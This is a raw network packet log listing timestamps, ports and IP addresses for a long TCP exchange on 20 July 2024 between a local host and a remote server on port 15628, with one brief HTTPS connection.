Jul 20, 2024 16:31:30.264184952 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.271841049 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.271914959 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.299350977 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.307785988 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.307853937 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.307960987 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.322168112 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.322367907 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.338990927 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.339073896 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.344074011 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.344135046 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.353552103 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.353847027 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.360251904 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.360321999 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.373116016 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.373214960 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.386934042 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.387022018 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.392556906 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.392683029 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.400557041 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.400646925 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.415329933 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.415407896 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.422620058 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.422693014 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.432060957 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.432151079 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.449917078 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.450093985 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.472332954 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.478161097 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.481748104 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.483714104 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.486129999 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.490467072 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.491277933 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.493803978 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.500344038 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.501627922 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.507555008 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.509589911 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.517839909 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.521804094 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.533529043 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.537784100 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.561469078 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.571095943 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.574413061 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.580590963 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.581969976 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.586899042 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.589596987 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.611541986 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.618935108 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.622088909 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.622837067 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.626568079 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.632209063 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.632272959 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.633840084 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.639008999 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.641695023 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.648442984 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.649626970 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.657222986 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.657438993 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.667254925 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.669720888 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.677412033 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.678205013 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.684803009 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.684988022 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.691277981 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.693627119 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.700773001 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.701754093 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.711802959 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.714238882 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.719302893 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.721931934 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.730195999 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.733758926 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.740255117 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.741817951 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.750178099 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.753634930 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.758660078 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.762047052 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.767426968 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.769761086 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.775247097 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.777690887 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.783632994 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.785593987 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.794900894 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.797842979 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.803440094 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.805598974 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.815732002 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.817625046 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.839884996 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.857835054 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.859388113 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.882920027 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.885938883 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.888941050 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.890081882 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.896622896 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.897825956 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.905814886 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.909616947 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.914913893 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.917628050 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.922545910 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.925554991 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.931196928 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.933844090 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.940119028 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.940319061 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.948369980 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.949732065 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.956342936 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.957525969 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.962480068 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.963017941 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.968218088 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.969604015 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.975294113 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.977742910 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.982783079 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.983165979 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.988635063 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.988768101 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.994040966 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:30.994148970 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:30.999217033 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.001653910 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.006886959 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.007024050 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.015073061 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.017718077 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.024827003 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.024955988 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.030148029 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.030874968 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.036283016 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.036506891 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.041933060 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.042054892 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.047056913 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.049639940 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.055151939 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.057552099 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.062855005 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.063354969 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.068346977 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.068511963 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.074646950 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.075150013 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.081149101 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.081269979 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.090878010 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.091248989 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.099865913 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.101109982 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.107251883 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.109098911 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.114216089 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.114603043 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.119836092 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.119988918 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.142962933 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.145472050 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.145541906 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.150923967 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.151144981 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.159913063 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.165177107 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.165452957 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.170319080 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.170581102 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.175580025 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.175729036 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.180813074 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.181958914 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.186997890 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.187566996 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.194502115 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.195247889 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.202159882 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.202271938 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.207807064 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.209743977 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.215607882 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.215781927 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.220793009 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.221652985 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.227180958 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.229732990 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.234663010 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.234813929 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.239779949 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.239902020 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.244834900 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.245831966 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.251386881 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.251523972 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.259006023 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.259375095 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.264331102 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.265554905 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.271925926 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.273658037 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.278732061 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.279326916 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.284809113 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.285064936 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.292411089 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.292496920 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.301321983 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.301589966 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.309226036 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.309710979 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.314974070 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.317784071 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.323055029 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.325612068 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.330787897 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.333555937 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.335756063 CEST	49752	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:31:31.335823059 CEST	443	49752	35.227.223.56	192.168.2.6
Jul 20, 2024 16:31:31.338887930 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.341734886 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.347029924 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.349598885 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.357213020 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.361624956 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.367659092 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.369718075 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.374702930 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.377603054 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.383050919 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.385771036 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.391062021 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.393623114 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.398452997 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.401552916 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.408344030 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.408497095 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.420763969 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.421719074 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.427901030 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.429636002 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.446949005 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.449609041 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.456520081 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.457585096 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.466682911 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.469520092 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.474724054 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.474786997 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.481774092 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.481836081 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.488477945 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.488540888 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.497195005 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.497268915 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.503603935 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.503664970 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.509975910 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.510035038 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.515846968 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.515897989 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.520819902 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.520868063 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.525736094 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.525789976 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.533164024 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.533221960 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.538140059 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.538194895 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.545254946 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.545310020 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.552501917 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.552563906 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.561103106 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.561161041 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.568324089 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.568377972 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.574641943 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.574696064 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.579782963 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.579838037 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.585006952 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.585072041 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.591257095 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.591311932 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.622514963 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.630072117 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.630125046 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.630954981 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.631011009 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.636518002 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.636576891 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.644690990 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.644748926 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.651371002 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.651470900 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.656341076 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.656394958 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.662312984 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.662367105 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.667407990 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.667457104 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.672945023 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.672997952 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.678009987 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.678061962 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.683177948 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.683234930 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.688210011 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.688357115 CEST	49722	15628	192.168.2.6	154.204.0.5
